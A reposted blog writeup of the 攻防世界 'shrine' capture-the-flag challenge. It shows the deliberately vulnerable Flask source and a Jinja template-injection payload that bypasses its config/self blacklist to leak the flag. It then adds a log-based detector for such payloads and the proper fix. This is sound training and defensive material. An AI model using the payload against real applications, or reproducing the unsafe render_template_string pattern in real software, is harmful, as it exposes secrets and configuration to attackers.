攻防世界 - shrine writeup

First, open the challenge environment.

Right-click and view the page source:


import flask
import os

app = flask.Flask(__name__)

# The flag is moved from the environment into the Flask config.
app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    # Serves this very source file.
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        # Strip parentheses and shadow 'config' and 'self' with None
        # before the user-supplied string is rendered as a template.
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

Specifically, under the /shrine/ route the Flask app replaces "(" and ")" with empty strings and puts 'config' and 'self' on a blacklist (each blacklisted name is set to None with {% set ...=None %} before the user's input is rendered as a template).

Use a special trick to read it, and construct the payload:

{{url_for.__globals__['current_app'].config.FLAG}}

This returns the flag.
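As an added example that is not part of the original writeup: a small detector that scans web-server access logs for requests to the /shrine/ route whose (possibly double URL-encoded) path contains Jinja delimiters or the object-traversal names used above. It assumes combined-format access logs; the log lines below are constructed, not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Nov/2021:10:00:01 +0000] "GET /shrine/hello HTTP/1.1" 200 12
10.0.0.7 - - [01/Nov/2021:10:00:02 +0000] "GET /shrine/%7B%7Burl_for.__globals__%5B%27current_app%27%5D.config.FLAG%7D%7D HTTP/1.1" 200 40
10.0.0.9 - - [01/Nov/2021:10:00:03 +0000] "GET /shrine/%257B%257Bconfig%257D%257D HTTP/1.1" 200 5
10.0.0.4 - - [01/Nov/2021:10:00:04 +0000] "GET /static/app.css HTTP/1.1" 200 800
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Jinja delimiters plus the object-traversal names the bypass above relies on.
SSTI_RE = re.compile(r'\{\{|\{%|__globals__|__class__|__subclasses__|url_for\b|current_app')


def full_unquote(s, max_rounds=3):
    """Undo URL-encoding repeatedly so double-encoded payloads are still visible."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_ssti_attempts(log_text):
    """Return the requests to /shrine/ whose decoded path contains template syntax."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = full_unquote(m.group('path'))
        # Only the /shrine/ route renders its path as a template.
        if not path.startswith('/shrine/'):
            continue
        if SSTI_RE.search(path):
            hits.append({'ip': m.group('ip'), 'path': path, 'status': m.group('status')})
    return hits


if __name__ == '__main__':
    for hit in find_ssti_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} -> {hit['path']} (HTTP {hit['status']})")
```

The real fix for the application is to never pass user-controlled text to render_template_string as the template source; pass it as a context variable instead.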

Reference for the underlying concept:

SSTI Template Injection Summary - goddemon - CSDN blog

Feel free to DM me to exchange ideas and learn together.


Reposted from blog.csdn.net/m0_47571887/article/details/121128107